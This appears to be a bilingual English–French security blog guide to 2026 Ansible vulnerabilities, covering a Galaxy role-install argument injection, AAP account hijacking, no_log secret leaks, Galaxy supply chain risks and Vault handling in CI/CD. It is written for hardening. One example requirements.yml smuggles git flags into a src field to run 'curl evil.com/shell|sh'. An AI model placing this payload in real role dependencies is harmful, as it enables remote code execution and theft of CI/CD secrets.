Ansible Security Vulnerabilities in 2026: CVE-2026-11332 (Galaxy RCE), CVE-2026-6266 (Account Hijacking) & Playbook Hardening GuideVulnérabilités Sécurité Ansible en 2026 : CVE-2026-11332 (RCE Galaxy), CVE-2026-6266 (Détournement de Compte) & Guide Durcissement Playbook

Ansible powers the configuration management layer for millions of servers worldwide — from bare-metal provisioning to Kubernetes cluster hardening. But in June 2026, a critical vulnerability changed the threat model for every team running ansible-galaxy role install in their CI/CD pipeline. CVE-2026-11332 (CVSS 7.8), published on June 5, 2026, allows a malicious Ansible Galaxy role to execute arbitrary code on the machine running the installation by injecting arbitrary git configuration flags via a crafted requirements.yml file. Combined with CVE-2026-6266 (CVSS 8.3) — which enables full account hijacking in Ansible Automation Platform — 2026 is proving to be a decisive year for Ansible security.

Ansible propulse la couche de gestion de configuration de millions de serveurs dans le monde — du provisionnement bare-metal au durcissement de clusters Kubernetes. Mais en juin 2026, une vulnérabilité critique a changé le modèle de menace pour toutes les équipes qui exécutent ansible-galaxy role install dans leur pipeline CI/CD. CVE-2026-11332 (CVSS 7.8), publiée le 5 juin 2026, permet à un rôle Ansible Galaxy malveillant d'exécuter du code arbitraire sur la machine effectuant l'installation en injectant des flags git arbitraires via un fichier requirements.yml forgé. Combinée à CVE-2026-6266 (CVSS 8.3) — qui permet le détournement total de compte dans Ansible Automation Platform — 2026 s'avère être une année décisive pour la sécurité Ansible.

This guide covers every significant Ansible security vulnerability of 2026, explains the exploitation paths, and provides a complete hardening checklist — Ansible Vault configuration, no_log patterns, Galaxy supply chain controls, and CI/CD secrets management.

Ce guide couvre toutes les vulnérabilités de sécurité Ansible significatives de 2026, explique les chemins d'exploitation et fournit une checklist complète de durcissement — configuration Ansible Vault, patterns no_log, contrôles supply chain Galaxy et gestion des secrets en CI/CD.

CVE-2026-11332: Ansible Galaxy Role Install RCE (CVSS 7.8)

CVE-2026-11332 : RCE via Installation de Rôle Ansible Galaxy (CVSS 7.8)

Published on June 5, 2026, CVE-2026-11332 is an argument injection vulnerability in ansible-core's ansible-galaxy role install command. The flaw exists because dependency specifications in a role's meta/requirements.yml file do not properly neutralize argument delimiters in the src field, enabling injection of arbitrary git configuration flags.

Publiée le 5 juin 2026, CVE-2026-11332 est une vulnérabilité d'injection d'arguments dans la commande ansible-galaxy role install d'ansible-core. La faille existe parce que les spécifications de dépendances dans le fichier meta/requirements.yml d'un rôle ne neutralisent pas correctement les délimiteurs d'arguments dans le champ src, permettant l'injection de flags git arbitraires.

How the attack works: When you install a role that declares a git-sourced dependency in its requirements, Ansible calls git clone with the attacker-controlled src value. By embedding arguments like --upload-pack=/bin/sh or --config core.gitProxy=evil, the malicious role triggers code execution on the developer's machine — or worse, in your CI/CD runner where it has access to secrets, environment variables, and cloud credentials.

Comment fonctionne l'attaque : Lorsque vous installez un rôle qui déclare une dépendance sourcée depuis git dans ses requirements, Ansible appelle git clone avec la valeur src contrôlée par l'attaquant. En intégrant des arguments comme --upload-pack=/bin/sh ou --config core.gitProxy=evil, le rôle malveillant déclenche une exécution de code sur la machine du développeur — ou pire, dans votre runner CI/CD où il a accès aux secrets, variables d'environnement et credentials cloud.

# Malicious meta/requirements.yml exploiting CVE-2026-11332
dependencies:
  - src: "https://github.com/legit/role --upload-pack=/bin/bash -c 'curl evil.com/shell|sh' --"
    name: "legitimate-looking-role"
    version: "1.0.0"

Who is affected: Any team running ansible-galaxy role install -r requirements.yml with roles pulled from Ansible Galaxy or untrusted git repositories. The impact is local privilege escalation or full CI/CD runner compromise — CVSS 7.8 High.

Qui est affecté : Toute équipe exécutant ansible-galaxy role install -r requirements.yml avec des rôles récupérés depuis Ansible Galaxy ou des dépôts git non fiables. L'impact est une escalade de privilèges locale ou la compromission totale du runner CI/CD — CVSS 7.8 High.

Remediation:

Remédiation :

• Update ansible-core to the patched version (check the Red Hat advisory for the exact version per your distribution).
• Mettez à jour ansible-core vers la version corrigée (vérifiez l'advisory Red Hat pour la version exacte selon votre distribution).
• Pin your Galaxy roles to specific commit SHAs rather than version tags — tags can be rewritten (as seen in the Laravel-lang attack).
• Épinglez vos rôles Galaxy à des SHAs de commit spécifiques plutôt qu'à des tags de version — les tags peuvent être réécrits (comme dans l'attaque Laravel-lang).
• Audit every requirements.yml for src fields containing special characters or argument-like strings.
• Auditez chaque requirements.yml à la recherche de champs src contenant des caractères spéciaux ou des chaînes ressemblant à des arguments.
• Run Galaxy role installs in an isolated environment (container or VM) before using them in production pipelines.
• Exécutez les installations de rôles Galaxy dans un environnement isolé (conteneur ou VM) avant de les utiliser dans les pipelines de production.

CVE-2026-6266: Ansible Automation Platform Account Hijacking (CVSS 8.3)

CVE-2026-6266 : Détournement de Compte Ansible Automation Platform (CVSS 8.3)

CVE-2026-6266 affects Ansible Automation Platform (AAP) 2.5 and 2.6 — Red Hat's enterprise Ansible control plane. The vulnerability was introduced with the auto-link strategy in AAP 2.6, which automatically links an external Identity Provider (IDP) identity to an existing AAP user account based solely on matching email addresses — without verifying that the IDP controls or has validated that email address.

CVE-2026-6266 affecte Ansible Automation Platform (AAP) 2.5 et 2.6 — le plan de contrôle Ansible enterprise de Red Hat. La vulnérabilité a été introduite avec la stratégie d'auto-linkage dans AAP 2.6, qui lie automatiquement une identité de fournisseur d'identité (IDP) externe à un compte utilisateur AAP existant basé uniquement sur la correspondance d'adresses email — sans vérifier que l'IDP contrôle ou a validé cette adresse email.

Attack scenario: An attacker registers an account at any IDP (Google, GitHub, Okta, SAML provider) with the email address of a known AAP admin. When they authenticate via that IDP, AAP silently merges the external identity with the existing admin account — granting full administrative control over your entire Ansible automation infrastructure, inventories, credentials, and playbooks.

Scénario d'attaque : Un attaquant crée un compte dans n'importe quel IDP (Google, GitHub, Okta, fournisseur SAML) avec l'adresse email d'un admin AAP connu. Lors de l'authentification via cet IDP, AAP fusionne silencieusement l'identité externe avec le compte admin existant — accordant un contrôle administratif complet sur toute votre infrastructure d'automatisation Ansible, inventaires, credentials et playbooks.

CVSS breakdown: Network access vector (AV:N), Low complexity (AC:L), Low privileges required (PR:L), No user interaction (UI:N) — CVSS 8.3 High. The "Low privileges required" refers to having any IDP account, not an AAP account.

Décomposition CVSS : Vecteur d'accès réseau (AV:N), faible complexité (AC:L), faibles privilèges requis (PR:L), aucune interaction utilisateur (UI:N) — CVSS 8.3 High. Les "faibles privilèges requis" font référence au fait d'avoir n'importe quel compte IDP, pas un compte AAP.

Remediation: Apply Red Hat Security Advisory RHSA-2026:13512. Disable auto-link IDP strategies in automation-controller and automation-gateway until patched. Enforce explicit email verification in your IDP before federating identities into AAP.

Remédiation : Appliquez l'advisory de sécurité Red Hat RHSA-2026:13512. Désactivez les stratégies d'auto-linkage IDP dans automation-controller et automation-gateway jusqu'au patch. Imposez une vérification explicite des emails dans votre IDP avant de fédérer les identités dans AAP.

Ansible's Persistent Secrets Exposure Problem: no_log and Verbose Leaks

Le Problème Persistant d'Exposition de Secrets Ansible : no_log et Fuites Verbose

Beyond named CVEs, Ansible has a structural secrets exposure challenge that affects teams regardless of patch status. Two patterns are responsible for most credential leaks in Ansible deployments:

Au-delà des CVEs nommées, Ansible a un défi structurel d'exposition de secrets qui affecte les équipes indépendamment du statut de patch. Deux patterns sont responsables de la plupart des fuites de credentials dans les déploiements Ansible :

Pattern 1 — include_vars without no_log

Pattern 1 — include_vars sans no_log

When using include_vars to load vaulted variables, the task itself doesn't log secrets by default — but any subsequent task that uses those variables without no_log: true will print them in plaintext to the playbook output. This means secrets encrypted in Ansible Vault can appear in CI/CD logs, monitoring systems, and anywhere your playbook output is stored.

Lors de l'utilisation d'include_vars pour charger des variables vaultées, la tâche elle-même ne logue pas les secrets par défaut — mais toute tâche ultérieure qui utilise ces variables sans no_log: true les affichera en clair dans la sortie du playbook. Cela signifie que les secrets chiffrés dans Ansible Vault peuvent apparaître dans les logs CI/CD, les systèmes de monitoring et partout où la sortie du playbook est stockée.

# DANGEROUS: secrets will appear in verbose output
- name: Load encrypted credentials
  include_vars: vault.yml

- name: Configure database (LOGS the password!)
  community.postgresql.postgresql_user:
    name: ""
    password: ""  # printed in verbose mode

# SAFE: add no_log to every task handling secrets
- name: Configure database (safe)
  community.postgresql.postgresql_user:
    name: ""
    password: ""
  no_log: true

Pattern 2 — Module parameters logged in verbose mode

Pattern 2 — Paramètres de module loggués en mode verbose

A documented class of vulnerabilities affects several Ansible modules where parameters containing credentials (tokens, passwords, API keys) were being logged in plaintext on managed nodes, as well as being visible on the controller node when run in verbose mode. While most well-maintained modules implement the no_log feature for sensitive parameters, community modules and custom modules often do not.

Une classe documentée de vulnérabilités affecte plusieurs modules Ansible où les paramètres contenant des credentials (tokens, mots de passe, clés API) étaient loggués en clair sur les nœuds managés, et visibles sur le nœud contrôleur en mode verbose. Bien que la plupart des modules bien maintenus implémentent la fonctionnalité no_log pour les paramètres sensibles, les modules communautaires et les modules personnalisés souvent ne le font pas.

Defense checklist for secrets exposure:

Checklist de défense contre l'exposition de secrets :

• Add no_log: true to every task that handles a variable containing a secret — not just the task that loads it.
• Ajoutez no_log: true à chaque tâche qui manipule une variable contenant un secret — pas seulement la tâche qui la charge.
• Use the vault_ naming convention: prefix all vault-encrypted variables with vault_ so they're immediately recognizable and auditable.
• Utilisez la convention de nommage vault_ : préfixez toutes les variables chiffrées par vault avec vault_ pour qu'elles soient immédiatement identifiables et auditables.
• Run ansible-lint with the no-log-password rule enabled to catch missing no_log directives in code review.
• Exécutez ansible-lint avec la règle no-log-password activée pour détecter les directives no_log manquantes en code review.
• Never run playbooks with -vvvv in production or pipe verbose output to shared logging systems without secrets scrubbing.
• N'exécutez jamais des playbooks avec -vvvv en production ou ne pipez jamais la sortie verbose vers des systèmes de logging partagés sans nettoyage des secrets.

Ansible Galaxy Supply Chain Risks: Malicious Collections and Roles

Risques Supply Chain Ansible Galaxy : Collections et Rôles Malveillants

Ansible Galaxy is the community hub for sharing roles and collections — and like PyPI, npm, and Composer before it, it has become an increasingly attractive supply chain attack surface. Unlike npm packages that run arbitrary code only if you explicitly call a function, Ansible roles and collections execute tasks directly against your infrastructure with the privileges of your Ansible controller user — often root.

Ansible Galaxy est le hub communautaire pour partager rôles et collections — et comme PyPI, npm et Composer avant lui, il est devenu une surface d'attaque supply chain de plus en plus attractive. Contrairement aux packages npm qui n'exécutent du code arbitraire que si vous appelez explicitement une fonction, les rôles et collections Ansible exécutent des tâches directement contre votre infrastructure avec les privilèges de votre utilisateur contrôleur Ansible — souvent root.

Attack vectors specific to Ansible Galaxy:

Vecteurs d'attaque spécifiques à Ansible Galaxy :

• Typosquatting roles: Community roles with names similar to popular ones (e.g., geerlingguy.nginx vs geelingguy.nginx) that execute malicious tasks under the guise of configuration management.
• Typosquatting de rôles : Rôles communautaires avec des noms similaires aux populaires (ex. geerlingguy.nginx vs geelingguy.nginx) qui exécutent des tâches malveillantes sous couvert de gestion de configuration.
• Maintainer account compromise: As seen with npm's Miasma worm and Laravel-lang attack, legitimate maintainer accounts can be compromised to push backdoored versions of trusted roles.
• Compromission de compte mainteneur : Comme observé avec le ver Miasma npm et l'attaque Laravel-lang, des comptes mainteneurs légitimes peuvent être compromis pour pousser des versions backdoorées de rôles de confiance.
• Nested dependency injection: A role's meta/requirements.yml can pull in additional roles transitively — CVE-2026-11332 is directly exploitable through this mechanism.
• Injection de dépendances imbriquées : Le meta/requirements.yml d'un rôle peut tirer des rôles supplémentaires de manière transitive — CVE-2026-11332 est directement exploitable via ce mécanisme.
• Malicious Python dependencies via collections: Ansible collections can bundle Python dependencies. The Python supply chain attack surface extends into your Ansible control plane through this mechanism.
• Dépendances Python malveillantes via les collections : Les collections Ansible peuvent embarquer des dépendances Python. La surface d'attaque supply chain Python s'étend dans votre plan de contrôle Ansible via ce mécanisme.

Galaxy Supply Chain Hardening

Durcissement Supply Chain Galaxy

# ansible.cfg — restrict Galaxy sources to trusted namespaces
[galaxy]
server_list = my_private_server, automation_hub

[galaxy_server.my_private_server]
url=https://galaxy.example.com/
auth_url=https://sso.example.com/token/
token=my_ah_token

[galaxy_server.automation_hub]
url=https://cloud.redhat.com/api/automation-hub/
auth_url=https://sso.redhat.com/auth/token
token=my_ah_token

• Pin every role and collection to an exact version in requirements.yml — never use version: "*".
• Épinglez chaque rôle et collection à une version exacte dans requirements.yml — n'utilisez jamais version: "*".
• Use a private Automation Hub or Ansible Galaxy mirror where content is reviewed before publication to your organization.
• Utilisez un Automation Hub privé ou un miroir Ansible Galaxy où le contenu est examiné avant publication dans votre organisation.
• Verify role checksums after download — Ansible Galaxy provides SHA256 checksums for collections via ansible-galaxy collection verify.
• Vérifiez les checksums des rôles après téléchargement — Ansible Galaxy fournit des checksums SHA256 pour les collections via ansible-galaxy collection verify.
• Run the open-source Ansible Risk Insight (ARI) tool to evaluate quality and risk of Galaxy content before adoption.
• Exécutez l'outil open-source Ansible Risk Insight (ARI) pour évaluer la qualité et le risque du contenu Galaxy avant adoption.

Ansible Vault in CI/CD: Best Practices for 2026

Ansible Vault en CI/CD : Bonnes Pratiques 2026

Ansible Vault encrypts secrets at rest using AES-256 — but the vault password itself needs to be managed carefully, especially in CI/CD pipelines where it's easy to accidentally expose it in environment variables or logs.

Ansible Vault chiffre les secrets au repos avec AES-256 — mais le mot de passe vault lui-même doit être géré soigneusement, particulièrement dans les pipelines CI/CD où il est facile de l'exposer accidentellement dans les variables d'environnement ou les logs.

The Correct Pattern for CI/CD

Le Pattern Correct pour le CI/CD

# GitHub Actions — secure Ansible Vault in CI/CD (2026 pattern)
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Install dependencies
        run: pip install ansible

      - name: Write vault password (never log it)
        run: echo "${{ secrets.ANSIBLE_VAULT_PASSWORD }}" > .vault_pass
        # Immediately restrict permissions
        # Note: use a vault password file, not --vault-password

      - name: Run playbook
        run: |
          ansible-playbook site.yml \
            --vault-password-file .vault_pass \
            --inventory inventory/production
        env:
          ANSIBLE_NOCOLOR: "1"
          # Never pass vault password via environment variable directly

      - name: Cleanup vault password
        if: always()
        run: shred -u .vault_pass 2>/dev/null || rm -f .vault_pass

Key principles for Ansible Vault in CI/CD (source: oneuptime.com, env0.com, 2026):

Principes clés pour Ansible Vault en CI/CD (source : oneuptime.com, env0.com, 2026) :

• Store the vault password in your CI/CD platform's secret management (GitHub Actions Secrets, GitLab CI Variables, HashiCorp Vault), never in the repository.
• Stockez le mot de passe vault dans la gestion des secrets de votre plateforme CI/CD (GitHub Actions Secrets, GitLab CI Variables, HashiCorp Vault), jamais dans le dépôt.
• Use --vault-password-file rather than --ask-vault-pass — interactive prompts don't work in CI and lead to insecure workarounds.
• Utilisez --vault-password-file plutôt que --ask-vault-pass — les prompts interactifs ne fonctionnent pas en CI et mènent à des contournements non sécurisés.
• For enterprise environments, integrate with HashiCorp Vault or AWS Secrets Manager: secrets are fetched at runtime via a vault lookup plugin, never stored in Ansible Vault files at all.
• Pour les environnements enterprise, intégrez HashiCorp Vault ou AWS Secrets Manager : les secrets sont récupérés au runtime via un plugin de lookup vault, jamais stockés dans des fichiers Ansible Vault.
• Use vault IDs for multi-environment setups: --vault-id prod@vault_pass_prod --vault-id dev@vault_pass_dev — this prevents accidental decryption of production secrets in dev pipelines.
• Utilisez des vault IDs pour les configurations multi-environnements : --vault-id prod@vault_pass_prod --vault-id dev@vault_pass_dev — cela évite le déchiffrement accidentel de secrets de production dans les pipelines dev.
• Rotate vault passwords at least every 90 days, and immediately after any team member departure or suspected compromise.
• Faites tourner les mots de passe vault au moins tous les 90 jours, et immédiatement après le départ de tout membre de l'équipe ou en cas de compromission suspectée.

Ansible Security Hardening Checklist for 2026

Checklist de Durcissement de Sécurité Ansible 2026

Apply these controls systematically to reduce your Ansible attack surface:

Appliquez ces contrôles systématiquement pour réduire votre surface d'attaque Ansible :

Monitoring Ansible Dependencies for CVEs: The Missing Layer

Monitoring des Dépendances Ansible pour les CVEs : La Couche Manquante

CVE-2026-11332 was published on June 5, 2026. Teams that had automated CVE monitoring for their Python dependencies were alerted within hours. Teams that relied on manual processes or periodic audits had their CI/CD pipelines exposed for days before patching. The pattern is consistent across ecosystems — whether it's Python CVEs, npm packages, or infrastructure tooling like ansible-core.

CVE-2026-11332 a été publiée le 5 juin 2026. Les équipes qui avaient un monitoring automatisé des CVEs pour leurs dépendances Python ont été alertées en quelques heures. Les équipes qui reposaient sur des processus manuels ou des audits périodiques ont eu leurs pipelines CI/CD exposés pendant des jours avant de patcher. Le pattern est cohérent dans tous les écosystèmes — que ce soient les CVEs Python, les packages npm, ou les outils d'infrastructure comme ansible-core.

What to monitor in an Ansible deployment:

Quoi monitorer dans un déploiement Ansible :

• ansible-core pip package — where CVE-2026-11332 lives
• ansible-core pip package — là où réside CVE-2026-11332
• ansible meta-package and all bundled collections
• Le méta-package ansible et toutes les collections embarquées
• Python dependencies installed alongside Ansible (cryptography, pyasn1, pyjwt, jinja2)
• Les dépendances Python installées avec Ansible (cryptography, pyasn1, pyjwt, jinja2)
• Galaxy collections pinned in requirements.yml — new CVEs are continuously published against community collections
• Les collections Galaxy épinglées dans requirements.yml — de nouvelles CVEs sont continuellement publiées contre les collections communautaires

Frequently Asked Questions

Questions fréquentes